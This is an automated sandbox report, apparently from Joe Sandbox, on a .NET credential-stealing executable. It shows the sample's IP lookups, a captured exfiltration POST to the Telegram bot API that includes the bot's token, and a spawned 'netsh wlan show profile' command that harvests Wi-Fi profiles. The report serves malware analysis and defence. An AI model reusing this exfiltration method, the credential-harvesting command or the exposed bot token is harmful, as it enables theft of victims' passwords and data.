File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpDCE2.tmp.dat

Download File

Process:	C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.3528485475628876
Encrypted:	false
SSDEEP:	12:TLiN6CZhDu6MvDOF5yEHFxOUwa5qguYZ75fOSiPe2d:TLiwCZwE8I6Uwcco5fBtC
MD5:	F2B4FB2D384AA4E4D6F4AEB0BBA217DC
SHA1:	2CD70CFB3CE72D9B079170C360C1F563B6BF150E
SHA-256:	1ECC07CD1D383472DAD33D2A5766625009EA5EACBAEDE2417ADA1842654CBBC8
SHA-512:	48D03991660FA1598B3E002F5BC5F0F05E9696BCB2289240FA8CCBB2C030CDD23245D4ECC0C64DA1E7C54B092C3E60AE0427358F63087018BF0E6CEDC471DD34
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g.....4....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpDD31.tmp.dat

Download File

Process:	C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1221538113908904
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
MD5:	C1AE02DC8BFF5DD65491BF71C0B740A7
SHA1:	6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
SHA-256:	CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
SHA-512:	01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.046342040898018
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe
File size:	916'480 bytes
MD5:	2ae0772ccbb6ba5fdbd9c2e8369d0f02
SHA1:	16ecc3070e5a4347d8bee0d5fed8f99c57769efc
SHA256:	3af1eea1320c617f8607630704e19422a743eac1b6fb5e941ccb3e88f320610b
SHA512:	ff12e0c7dbbc25ccfbbd3a4f2d0665d2ed826b0ac8695307c523f9e748b29031dafa38c1fae64b3f847b81c27a40a5ab94d7c663cc741d9047094b8ea02c95c6
SSDEEP:	24576:2Bf3DbcnrLRjnFVBSU8IjCBuYouaWiKe6MC8EimkXctAzBktNVwqk8zGZsHgPuPK:PfhXG
TLSH:	2315BB18ED80D986D968F937C9F5F210C77675C35323D22F693A9DFA1182327898A4BC
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....k............"...0.................. ... ....@.. .......................`............@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4e0f2e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xAC136B0D [Sat Jun 25 19:35:41 2061 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xe0ed4	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xe2000	0x6ba	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xe4000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xdef34	0xdf000	ca7e6f652d61482c4451c989776120eb	False	0.24794067930213004	data	5.049706762063259	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xe2000	0x6ba	0x800	98d965ad979a690d6a29bf9e83aa8cc1	False	0.3779296875	data	3.734499537476846	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xe4000	0xc	0x200	540f8c34bb3007145dfcb0c7ac601163	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xe20a0	0x430	data			0.4412313432835821
RT_MANIFEST	0xe24d0	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-15T09:09:24.876838+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.9	49720	149.154.167.220	443	TCP
2025-01-15T09:09:25.107303+0100	2855039	ETPRO MALWARE UNK Stealer Telegram Exfil	1	192.168.2.9	49720	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 15, 2025 09:09:21.714885950 CET	49718	80	192.168.2.9	104.16.185.241
Jan 15, 2025 09:09:21.719692945 CET	80	49718	104.16.185.241	192.168.2.9
Jan 15, 2025 09:09:21.719763041 CET	49718	80	192.168.2.9	104.16.185.241
Jan 15, 2025 09:09:21.721158028 CET	49718	80	192.168.2.9	104.16.185.241
Jan 15, 2025 09:09:21.726094961 CET	80	49718	104.16.185.241	192.168.2.9
Jan 15, 2025 09:09:22.187599897 CET	80	49718	104.16.185.241	192.168.2.9
Jan 15, 2025 09:09:22.238790035 CET	49718	80	192.168.2.9	104.16.185.241
Jan 15, 2025 09:09:22.885174036 CET	49719	80	192.168.2.9	208.95.112.1
Jan 15, 2025 09:09:22.889987946 CET	80	49719	208.95.112.1	192.168.2.9
Jan 15, 2025 09:09:22.890063047 CET	49719	80	192.168.2.9	208.95.112.1
Jan 15, 2025 09:09:22.890181065 CET	49719	80	192.168.2.9	208.95.112.1
Jan 15, 2025 09:09:22.894921064 CET	80	49719	208.95.112.1	192.168.2.9
Jan 15, 2025 09:09:23.345371962 CET	80	49719	208.95.112.1	192.168.2.9
Jan 15, 2025 09:09:23.414406061 CET	49719	80	192.168.2.9	208.95.112.1
Jan 15, 2025 09:09:24.182336092 CET	49718	80	192.168.2.9	104.16.185.241
Jan 15, 2025 09:09:24.182509899 CET	49719	80	192.168.2.9	208.95.112.1
Jan 15, 2025 09:09:24.184221029 CET	49720	443	192.168.2.9	149.154.167.220
Jan 15, 2025 09:09:24.184237003 CET	443	49720	149.154.167.220	192.168.2.9
Jan 15, 2025 09:09:24.184396029 CET	49720	443	192.168.2.9	149.154.167.220
Jan 15, 2025 09:09:24.187495947 CET	80	49718	104.16.185.241	192.168.2.9
Jan 15, 2025 09:09:24.187572002 CET	49718	80	192.168.2.9	104.16.185.241
Jan 15, 2025 09:09:24.187752008 CET	80	49719	208.95.112.1	192.168.2.9
Jan 15, 2025 09:09:24.187805891 CET	49719	80	192.168.2.9	208.95.112.1
Jan 15, 2025 09:09:24.201855898 CET	49720	443	192.168.2.9	149.154.167.220
Jan 15, 2025 09:09:24.201872110 CET	443	49720	149.154.167.220	192.168.2.9
Jan 15, 2025 09:09:24.812489033 CET	443	49720	149.154.167.220	192.168.2.9
Jan 15, 2025 09:09:24.812567949 CET	49720	443	192.168.2.9	149.154.167.220
Jan 15, 2025 09:09:24.816265106 CET	49720	443	192.168.2.9	149.154.167.220
Jan 15, 2025 09:09:24.816272020 CET	443	49720	149.154.167.220	192.168.2.9
Jan 15, 2025 09:09:24.816512108 CET	443	49720	149.154.167.220	192.168.2.9
Jan 15, 2025 09:09:24.875237942 CET	49720	443	192.168.2.9	149.154.167.220
Jan 15, 2025 09:09:24.876754999 CET	49720	443	192.168.2.9	149.154.167.220
Jan 15, 2025 09:09:24.876785994 CET	443	49720	149.154.167.220	192.168.2.9
Jan 15, 2025 09:09:25.107356071 CET	443	49720	149.154.167.220	192.168.2.9
Jan 15, 2025 09:09:25.107429981 CET	443	49720	149.154.167.220	192.168.2.9
Jan 15, 2025 09:09:25.107484102 CET	49720	443	192.168.2.9	149.154.167.220
Jan 15, 2025 09:09:25.111299992 CET	49720	443	192.168.2.9	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 15, 2025 09:09:21.597028971 CET	60023	53	192.168.2.9	1.1.1.1
Jan 15, 2025 09:09:21.603688955 CET	53	60023	1.1.1.1	192.168.2.9
Jan 15, 2025 09:09:22.210076094 CET	59390	53	192.168.2.9	1.1.1.1
Jan 15, 2025 09:09:22.217128038 CET	53	59390	1.1.1.1	192.168.2.9
Jan 15, 2025 09:09:22.877515078 CET	62821	53	192.168.2.9	1.1.1.1
Jan 15, 2025 09:09:22.884393930 CET	53	62821	1.1.1.1	192.168.2.9
Jan 15, 2025 09:09:24.176315069 CET	65416	53	192.168.2.9	1.1.1.1
Jan 15, 2025 09:09:24.182795048 CET	53	65416	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 15, 2025 09:09:21.597028971 CET	192.168.2.9	1.1.1.1	0x4e66	Standard query (0)	icanhazip.com	A (IP address)	IN (0x0001)	false
Jan 15, 2025 09:09:22.210076094 CET	192.168.2.9	1.1.1.1	0x3d45	Standard query (0)	57.122.6.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Jan 15, 2025 09:09:22.877515078 CET	192.168.2.9	1.1.1.1	0xde0f	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Jan 15, 2025 09:09:24.176315069 CET	192.168.2.9	1.1.1.1	0x3149	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 15, 2025 09:09:21.603688955 CET	1.1.1.1	192.168.2.9	0x4e66	No error (0)	icanhazip.com		104.16.185.241	A (IP address)	IN (0x0001)	false
Jan 15, 2025 09:09:21.603688955 CET	1.1.1.1	192.168.2.9	0x4e66	No error (0)	icanhazip.com		104.16.184.241	A (IP address)	IN (0x0001)	false
Jan 15, 2025 09:09:22.217128038 CET	1.1.1.1	192.168.2.9	0x3d45	Name error (3)	57.122.6.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Jan 15, 2025 09:09:22.884393930 CET	1.1.1.1	192.168.2.9	0xde0f	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Jan 15, 2025 09:09:24.182795048 CET	1.1.1.1	192.168.2.9	0x3149	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.telegram.org

icanhazip.com

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49718	104.16.185.241	80	6580	C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 09:09:21.721158028 CET	63	OUT	GET / HTTP/1.1 Host: icanhazip.com Connection: Keep-Alive
Jan 15, 2025 09:09:22.187599897 CET	535	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 08:09:22 GMT Content-Type: text/plain Content-Length: 13 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET Set-Cookie: __cf_bm=hk87PTJ6L5ntlcJ.Lw00GfW5uOYy6iQ36zrxw66.lhw-1736928562-1.0.1.1-j83E_vLhFprypQUpZRxld4zFaG6BBrO7Vbt5RS8Va87a_N1veny0gKQFFbEjs1AUT2Y43WYxqnLhSZ_I2afZJg; path=/; expires=Wed, 15-Jan-25 08:39:22 GMT; domain=.icanhazip.com; HttpOnly Server: cloudflare CF-RAY: 902462195d361902-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 0a Data Ascii: 8.46.123.189

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49719	208.95.112.1	80	6580	C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 09:09:22.890181065 CET	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Jan 15, 2025 09:09:23.345371962 CET	175	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 08:09:22 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49720	149.154.167.220	443	6580	C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 08:09:24 UTC	233	OUT	POST /bot8122064310:AAFBCVyMfJVoD3s1eB-6ymRD9cZooNbGkNo/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---TelegramBotAPI_638725121748206353 Host: api.telegram.org Content-Length: 3052 Connection: Keep-Alive
2025-01-15 08:09:24 UTC	1024	OUT	Data Raw: 2d 2d 2d 2d 2d 54 65 6c 65 67 72 61 6d 42 6f 74 41 50 49 5f 36 33 38 37 32 35 31 32 31 37 34 38 32 30 36 33 35 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 32 30 34 31 32 31 35 34 31 32 0d 0a 2d 2d 2d 2d 2d 54 65 6c 65 67 72 61 6d 42 6f 74 41 50 49 5f 36 33 38 37 32 35 31 32 31 37 34 38 32 30 36 33 35 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 54 65 73 74 20 7c 20 43 6c 69 65 6e 74 20 4e 61 6d 65 3a 20 23 74 69 6e 61 0d 0a 50 61 73 73 77 6f 72 64 73 3a 20 30 0d 0a 43 72 65 64 69 74 43 61 72 64 73 3a 20 30 0d 0a 41 75 74 6f 46 69 Data Ascii: -----TelegramBotAPI_638725121748206353Content-Disposition: form-data; name="chat_id"2041215412-----TelegramBotAPI_638725121748206353Content-Disposition: form-data; name="caption"Test \| Client Name: #userPasswords: 0CreditCards: 0AutoFi
2025-01-15 08:09:24 UTC	2028	OUT	Data Raw: 74 78 74 85 8f cd 72 82 30 18 00 cf 71 c6 47 c1 e6 4b 08 21 07 0f 56 02 15 11 41 b1 2a 17 26 55 04 c7 1f 0a 4a 64 7c fa fa 04 76 f7 be 33 3b 28 aa aa 38 e7 83 5d 75 41 c9 62 25 d1 07 72 47 c1 52 22 a0 d4 a4 cc 22 80 31 07 ce 2c 8c 20 ca fc d1 02 11 4c a8 01 d8 c0 cc c0 a2 df 1b be a3 df 1b bc e9 33 8b db 40 84 78 f5 2d 20 28 9c 38 88 01 0c 4f e2 9e d0 9a 6f 0f 25 5c bb cc 5d 9e b1 e5 b2 95 cc f4 5e b9 71 93 1f bd 69 0e ca 09 6d 3a cb 75 ee f0 28 80 45 ba d1 ca bc 19 57 77 27 1e 2a 3e 8a e0 3e 55 ba 4d 26 3f ca 9e ad 4e 95 d7 32 5b be 84 e2 f1 99 25 6b df 0c 0b 23 38 8c f5 b3 cc 2f bc 09 9b 32 8d 89 f2 b4 9f 8a 82 24 db b2 ee c8 9a cc 4d c9 db af f8 19 9d a8 6e 03 3d 0b 3a 77 93 de 6a 69 85 fb d1 f7 31 76 e4 d8 fb ad fe dd ff 03 50 4b 03 04 14 00 00 00 08 Data Ascii: txtr0qGK!VA&UJd\|v3;(8]uAb%rGR""1, L3@x- (8Oo%\]^qim:u(EWw'>>UM&?N2[%k#8/2$Mn=:wji1vPK
2025-01-15 08:09:25 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 15 Jan 2025 08:09:25 GMT Content-Type: application/json Content-Length: 968 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-15 08:09:25 UTC	968	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 39 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 31 32 32 30 36 34 33 31 30 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 74 74 78 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 62 61 6e 74 74 78 78 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 34 31 32 31 35 34 31 32 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 42 75 6b 6b 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 62 75 6b 6b 79 31 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 39 32 38 35 36 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 74 69 6e 61 5f 32 Data Ascii: {"ok":true,"result":{"message_id":97,"from":{"id":8122064310,"is_bot":true,"first_name":"ttxx","username":"banttxx_bot"},"chat":{"id":2041215412,"first_name":"Bukky","username":"bukky101","type":"private"},"date":1736928565,"document":{"file_name":"user_2

Analysis Process: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exePID: 6580, Parent PID: 3504

General

Target ID:	2
Start time:	03:09:17
Start date:	15/01/2025
Path:	C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe"
Imagebase:	0x290000
File size:	916'480 bytes
MD5 hash:	2AE0772CCBB6BA5FDBD9C2E8369D0F02
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PXRECVOWEIWOEI, Description: Yara detected PXRECVOWEIWOEI Stealer, Source: 00000002.00000002.1526841628.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PXRECVOWEIWOEI, Description: Yara detected PXRECVOWEIWOEI Stealer, Source: 00000002.00000002.1526841628.0000000002B98000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PXRECVOWEIWOEI, Description: Yara detected PXRECVOWEIWOEI Stealer, Source: 00000002.00000002.1526841628.0000000002BC6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1526841628.0000000002641000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:09:20
Start date:	15/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Imagebase:	0x7ff7b2770000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:09:20
Start date:	15/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:09:20
Start date:	15/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff79ef00000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	03:09:20
Start date:	15/01/2025
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff79d9c0000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	03:09:20
Start date:	15/01/2025
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh wlan show profile
Imagebase:	0x7ff796030000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	03:09:20
Start date:	15/01/2025
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr All
Imagebase:	0x7ff6c7130000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exePID: 6580, Parent PID: 3504COMMON

Execution Graph

Execution Coverage:	19.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	100%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 00007FF886FC377D Relevance: 2.6, Instructions: 2615
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.1535098433.00007FF886FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff886fc0000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c421147f35716959fdd6e93129fd7bb4f82cc1495835fe3bd873e658e8f322e
Instruction ID: a2f75e4de3782bd16aab2c9f28747e6b4897823c819e634ac25ca33a0d143755
Opcode Fuzzy Hash: 0c421147f35716959fdd6e93129fd7bb4f82cc1495835fe3bd873e658e8f322e
Instruction Fuzzy Hash: 59031920E2C75D4BEB44BBBC445726972D1FF99784F500979E88EC7297ED38EC028686

Function 00007FF887143E1C Relevance: 1.7, Instructions: 1676
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

